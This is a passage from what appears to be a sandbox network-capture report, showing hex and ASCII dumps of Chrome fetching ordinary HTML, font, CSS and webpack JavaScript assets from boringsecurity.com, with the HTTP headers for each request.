                                                                          2023-12-10 16:44:47 UTC538INData Raw: 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 39 31 62 32 63 35 64 33 61 30 31 34 34 63 33 32 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 67 43 6b 59 51 6e 6c 77 4d 31 4b 46 79 6a 58 45 6c 48 30 6b 69 2f 5f 62 75 69 6c 64 4d 61 6e 69 66 65 73 74 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 67 43 6b 59 51 6e 6c 77 4d 31 4b 46 79 6a 58 45 6c 48 30 6b 69 2f 5f 73 73 67 4d 61 6e 69 66 65 73 74 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69
                                                                          Data Ascii: pt><script src="/_next/static/chunks/pages/index-91b2c5d3a0144c32.js" defer=""></script><script src="/_next/static/gCkYQnlwM1KFyjXElH0ki/_buildManifest.js" defer=""></script><script src="/_next/static/gCkYQnlwM1KFyjXElH0ki/_ssgManifest.js" defer=""></scri
                                                                          2023-12-10 16:44:47 UTC4744INData Raw: 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 43 34 6b 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 36 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56
                                                                          Data Ascii: vVnXBbObj2OVZyOOSr4dVJWUgsiH0C4k.woff) format('woff')}@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;font-stretch:normal;font-display:swap;src:url(https://fonts.gstatic.com/s/opensans/v36/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dV
                                                                          2023-12-10 16:44:47 UTC5930INData Raw: 2c 55 2b 30 31 36 38 2d 30 31 36 39 2c 55 2b 30 31 41 30 2d 30 31 41 31 2c 55 2b 30 31 41 46 2d 30 31 42 30 2c 55 2b 30 33 30 30 2d 30 33 30 31 2c 55 2b 30 33 30 33 2d 30 33 30 34 2c 55 2b 30 33 30 38 2d 30 33 30 39 2c 55 2b 30 33 32 33 2c 55 2b 30 33 32 39 2c 55 2b 31 45 41 30 2d 31 45 46 39 2c 55 2b 32 30 41 42 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 31 30 30 25 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73
                                                                          Data Ascii: ,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(https://fonts.gstatic.com/s/opensans
                                                                          2023-12-10 16:44:47 UTC7116INData Raw: 31 38 2e 32 31 38 20 32 2e 34 33 37 35 20 31 35 2e 33 36 31 33 56 31 35 2e 32 36 39 34 43 32 2e 34 33 37 35 20 31 35 2e 31 39 33 34 20 32 2e 34 39 39 36 35 20 31 35 2e 31 33 31 37 20 32 2e 35 37 36 31 38 20 31 35 2e 31 33 31 37 48 37 2e 30 38 33 32 38 43 37 2e 31 37 32 35 32 20 31 35 2e 31 33 31 37 20 37 2e 32 33 37 38 38 20 31 35 2e 32 31 34 20 37 2e 32 32 39 39 32 20 31 35 2e 33 30 31 31 43 37 2e 31 39 38 30 33 20 31 35 2e 35 39 32 35 20 37 2e 32 35 32 32 32 20 31 35 2e 38 39 30 32 20 37 2e 33 39 30 38 37 20 31 36 2e 31 36 31 43 37 2e 36 35 38 36 35 20 31 36 2e 37 30 30 39 20 38 2e 32 31 33 32 36 20 31 37 2e 30 33 38 32 20 38 2e 38 31 32 35 32 20 31 37 2e 30 33 38 32 48 31 31 2e 30 34 33 37 56 31 35 2e 33 30 37 34 48 38 2e 38 33 38 43 38 2e 37 32 34 38
                                                                          Data Ascii: 18.218 2.4375 15.3613V15.2694C2.4375 15.1934 2.49965 15.1317 2.57618 15.1317H7.08328C7.17252 15.1317 7.23788 15.214 7.22992 15.3011C7.19803 15.5925 7.25222 15.8902 7.39087 16.161C7.65865 16.7009 8.21326 17.0382 8.81252 17.0382H11.0437V15.3074H8.838C8.7248
                                                                          2023-12-10 16:44:47 UTC8302INData Raw: 33 30 35 39 20 35 2e 34 32 35 32 39 43 31 32 2e 37 35 36 34 20 35 2e 31 39 33 33 31 20 31 31 2e 32 31 34 38 20 35 2e 31 39 33 33 31 20 39 2e 36 39 37 30 33 20 35 2e 34 32 35 32 39 43 39 2e 35 35 39 35 35 20 35 2e 30 39 34 39 32 20 39 2e 33 35 36 31 33 20 34 2e 36 39 30 39 33 20 39 2e 31 37 38 31 33 20 34 2e 33 37 35 37 35 43 39 2e 31 36 34 36 31 20 34 2e 33 35 32 35 35 20 39 2e 31 33 38 34 20 34 2e 33 34 30 35 35 20 39 2e 31 31 32 31 37 20 34 2e 33 34 34 35 35 43 37 2e 36 37 32 32 39 20 34 2e 35 39 32 35 34 20 36 2e 32 39 34 33 39 20 35 2e 30 32 36 39 32 20 35 2e 30 30 38 36 37 20 35 2e 36 31 37 33 43 34 2e 39 39 37 35 34 20 35 2e 36 32 32 31 20 34 2e 39 38 38 20 35 2e 36 33 30 31 20 34 2e 39 38 31 36 37 20 35 2e 36 34 30 35 43 32 2e 33 36 38 30 39 20 39
                                                                          Data Ascii: 3059 5.42529C12.7564 5.19331 11.2148 5.19331 9.69703 5.42529C9.55955 5.09492 9.35613 4.69093 9.17813 4.37575C9.16461 4.35255 9.1384 4.34055 9.11217 4.34455C7.67229 4.59254 6.29439 5.02692 5.00867 5.6173C4.99754 5.6221 4.988 5.6301 4.98167 5.6405C2.36809 9
                                                                          2023-12-10 16:44:47 UTC3045INData Raw: 31 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 75 70 70 65 72 63 61 73 65 22 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 68 34 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 72 69 6c 6c 20 62 6f 72 64 65 72 2d 62 2d 32 20 62 6f 72 64 65 72 2d 77 68 69 74 65 20 70 78 2d 36 20 70 79 2d 38 20 73 6d 3a 70 79 2d 32 38 22 3e 3c 64 69 76 20 69 64 3d 22 73 68 6f 70 22 20 63 6c 61 73 73 3d 22 70 79 2d 34 22 3e 3c 2f 64 69 76 3e 3c 68 32 20 63 6c 61 73 73 3d 22 68 65 61 64 69 6e 67 2d 73 68 61 64 6f 77 20 70 62 2d 31 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 75 70 70 65 72 63 61 73 65 20 74 65 78 74 2d 77 68 69 74 65 22 3e 53 68 6f 70 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 69 74 65 6d 73 2d 63 65 6e 74 65
                                                                          Data Ascii: 12 text-center uppercase">Loading...</h4></div><div class="grill border-b-2 border-white px-6 py-8 sm:py-28"><div id="shop" class="py-4"></div><h2 class="heading-shadow pb-12 text-center uppercase text-white">Shop</h2><div class="flex flex-col items-cente
                                                                          2023-12-10 16:44:47 UTC2INData Raw: 0d 0a
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          77192.168.2.54980675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC572OUTGET /_next/static/css/ad4aef9984e4c1fd.css HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 33 35 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 62 35 37 35 61 61 63 63 66 33 37 61 62
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 43513Content-Type: text/css; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag: "b575aaccf37ab
                                                                          2023-12-10 16:44:48 UTC777INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 75 6e 70 6c 61 79 20 52 65 67 75 6c 61 72 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 6c 6f 63 61 6c 28 22 22 29 2c 75 72 6c 28 2f 66 6f 6e 74 73 2f 67 75 6e 70 6c 61 79 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 7d 0a 0a 2f 2a 0a 21 20 74 61 69 6c 77 69 6e 64 63 73 73 20 76 33 2e 30 2e 32 34 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 74 61 69 6c 77 69 6e 64 63 73 73 2e 63 6f 6d 0a 2a 2f 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 35
                                                                          Data Ascii: @font-face{font-family:Gunplay Regular;font-style:normal;font-weight:400;src:local(""),url(/fonts/gunplay.woff2) format("woff2")}/*! tailwindcss v3.0.24 | MIT License | https://tailwindcss.com*/*,:after,:before{box-sizing:border-box;border:0 solid #e5
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 43 6f 75 72 69 65 72 20 4e 65 77 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 7d 73 75 62 2c 73 75 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 35 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 74 61 62 6c 65 7b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73
                                                                          Data Ascii: o,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}table{text-indent:0;border-color:inherit;border-collaps
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 74 29 20 30 20 30 20 30 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 77 69 64 74 68 29 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 63 6f 6c 6f 72 29 3b 2d 2d 74 77 2d 72 69 6e 67 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 69 6e 73 65 74 29 20 30 20 30 20 30 20 63 61 6c 63 28 31 70 78 20 2b 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 77 69 64 74 68 29 29 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 73 68 61 64 6f 77 29 2c 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 73 68 61 64 6f 77 29 2c 76 61 72 28 2d 2d 74 77 2d 73 68 61 64 6f 77 29 3b 62 6f 72 64 65 72
                                                                          Data Ascii: t) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color);--tw-ring-shadow:var(--tw-ring-inset) 0 0 0 calc(1px + var(--tw-ring-offset-width)) var(--tw-ring-color);box-shadow:var(--tw-ring-offset-shadow),var(--tw-ring-shadow),var(--tw-shadow);border
                                                                          2023-12-10 16:44:48 UTC4744INData Raw: 65 64 69 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 7d 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2d 64 61 79 2d 66 69 65 6c 64 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2d 68 6f 75 72 2d 66 69 65 6c 64 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2d 6d 65 72 69 64 69 65 6d 2d 66 69 65 6c 64 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2d 6d 69 6c 6c 69 73 65 63 6f 6e 64 2d 66 69 65 6c 64 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d 65 64 69 74 2d 6d 69 6e 75 74 65 2d 66 69 65 6c 64 2c 3a 3a 2d 77 65 62 6b 69 74 2d 64 61 74 65 74 69 6d 65 2d
                                                                          Data Ascii: edit{display:inline-flex}::-webkit-datetime-edit,::-webkit-datetime-edit-day-field,::-webkit-datetime-edit-hour-field,::-webkit-datetime-edit-meridiem-field,::-webkit-datetime-edit-millisecond-field,::-webkit-datetime-edit-minute-field,::-webkit-datetime-
                                                                          2023-12-10 16:44:48 UTC5930INData Raw: 3a 23 66 66 66 3b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 35 39 2c 31 33 30 2c 32 34 36 2c 2e 35 29 3b 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 73 68 61 64 6f 77 3a 30 20 30 20 23 30 30 30 30 3b 2d 2d 74 77 2d 72 69 6e 67 2d 73 68 61 64 6f 77 3a 30 20 30 20 23 30 30 30 30 3b 2d 2d 74 77 2d 73 68 61 64 6f 77 3a 30 20 30 20 23 30 30 30 30 3b 2d 2d 74 77 2d 73 68 61 64 6f 77 2d 63 6f 6c 6f 72 65 64 3a 30 20 30 20 23 30 30 30 30 3b 2d 2d 74 77 2d 62 6c 75 72 3a 20 3b 2d 2d 74 77 2d 62 72 69 67 68 74 6e 65 73 73 3a 20 3b 2d 2d 74 77 2d 63 6f 6e 74 72 61 73 74 3a 20 3b 2d 2d 74 77 2d 67 72 61 79 73 63 61 6c 65 3a 20 3b 2d 2d 74 77 2d 68 75 65 2d 72 6f 74 61 74 65 3a 20 3b 2d 2d 74 77 2d 69 6e 76 65 72 74 3a 20 3b 2d 2d 74 77 2d
                                                                          Data Ascii: :#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-
                                                                          2023-12-10 16:44:48 UTC7116INData Raw: 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 70 72 65 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 6e 6f 6e 65 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 70 72 65 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 6e 6f
                                                                          Data Ascii: ;padding:0;font-weight:inherit;color:inherit;font-size:inherit;font-family:inherit;line-height:inherit}.prose :where(pre code):not(:where([class~=not-prose] *)):before{content:none}.prose :where(pre code):not(:where([class~=not-prose] *)):after{content:no
                                                                          2023-12-10 16:44:48 UTC8302INData Raw: 6c 69 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 33 33 33 33 33 33 33 65 6d 7d 2e 70 72 6f 73 65 2d 32 78 6c 20 3a 77 68 65 72 65 28 2e 70 72 6f 73 65 3e 75 6c 3e 6c 69 3e 3a 6c 61 73 74 2d 63 68 69 6c 64 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 33 33 33 33 33 33 33 65 6d 7d 2e 70 72 6f 73 65 2d 32 78 6c 20 3a 77 68 65 72 65 28 2e 70 72 6f 73 65 3e 6f 6c 3e 6c 69 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29
                                                                          Data Ascii: li>:first-child):not(:where([class~=not-prose] *)){margin-top:1.3333333em}.prose-2xl :where(.prose>ul>li>:last-child):not(:where([class~=not-prose] *)){margin-bottom:1.3333333em}.prose-2xl :where(.prose>ol>li>:first-child):not(:where([class~=not-prose] *)
                                                                          2023-12-10 16:44:48 UTC2989INData Raw: 62 28 32 30 33 20 32 31 33 20 32 32 35 2f 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 67 2d 62 6c 61 63 6b 7b 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 20 30 20 30 2f 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 67 2d 66 69 6c 74 65 72 2d 67 72 61 79 7b 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 31 38 20 31 38 20 31 38 2f 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 67 2d 5c 5b 5c 23 32 33 32 36 32 35 5c 5d 7b 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28
                                                                          Data Ascii: b(203 213 225/var(--tw-bg-opacity))}.bg-black{--tw-bg-opacity:1;background-color:rgb(0 0 0/var(--tw-bg-opacity))}.bg-filter-gray{--tw-bg-opacity:1;background-color:rgb(18 18 18/var(--tw-bg-opacity))}.bg-\[\#232625\]{--tw-bg-opacity:1;background-color:rgb(
                                                                          2023-12-10 16:44:48 UTC4096INData Raw: 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 70 74 2d 31 32 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 72 65 6d 7d 2e 70 74 2d 34 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 70 74 2d 38 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 72 65 6d 7d 2e 70 74 2d 32 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 35 72 65 6d 7d 2e 70 6c 2d 33 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 37 35 72 65 6d 7d 2e 70 72 2d 34 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 72 65 6d 7d 2e 74 65 78 74 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 61
                                                                          Data Ascii: {padding-bottom:2rem}.pt-12{padding-top:3rem}.pt-4{padding-top:1rem}.pt-8{padding-top:2rem}.pt-2{padding-top:.5rem}.pl-3{padding-left:.75rem}.pr-4{padding-right:1rem}.text-left{text-align:left}.text-center{text-align:center}.text-right{text-align:right}.a


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          78192.168.2.54980775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC568OUTGET /_next/static/chunks/webpack-2f410aecd915a041.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC422INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 31 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 4116Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag: "
                                                                          2023-12-10 16:44:48 UTC764INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 2c 75 2c 69 2c 63 2c 66 2c 61 3d 7b 7d 2c 64 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 76 61 72 20 74 3d 64 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 74 29 72 65 74 75 72 6e 20 74 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6e 3d 64 5b 65 5d 3d 7b 69 64 3a 65 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 72 3d 21 30 3b 74 72 79 7b 61 5b 65 5d 2e 63 61 6c 6c 28 6e 2e 65 78 70 6f 72 74 73 2c 6e 2c 6e 2e 65 78 70 6f 72 74 73 2c 6c 29 2c 72 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 72 26 26 64 65 6c 65 74 65 20 64 5b 65 5d 7d 72 65 74 75 72 6e 20 6e 2e 6c 6f 61 64 65 64 3d 21 30 2c 6e 2e 65 78 70 6f 72 74 73 7d 6c 2e
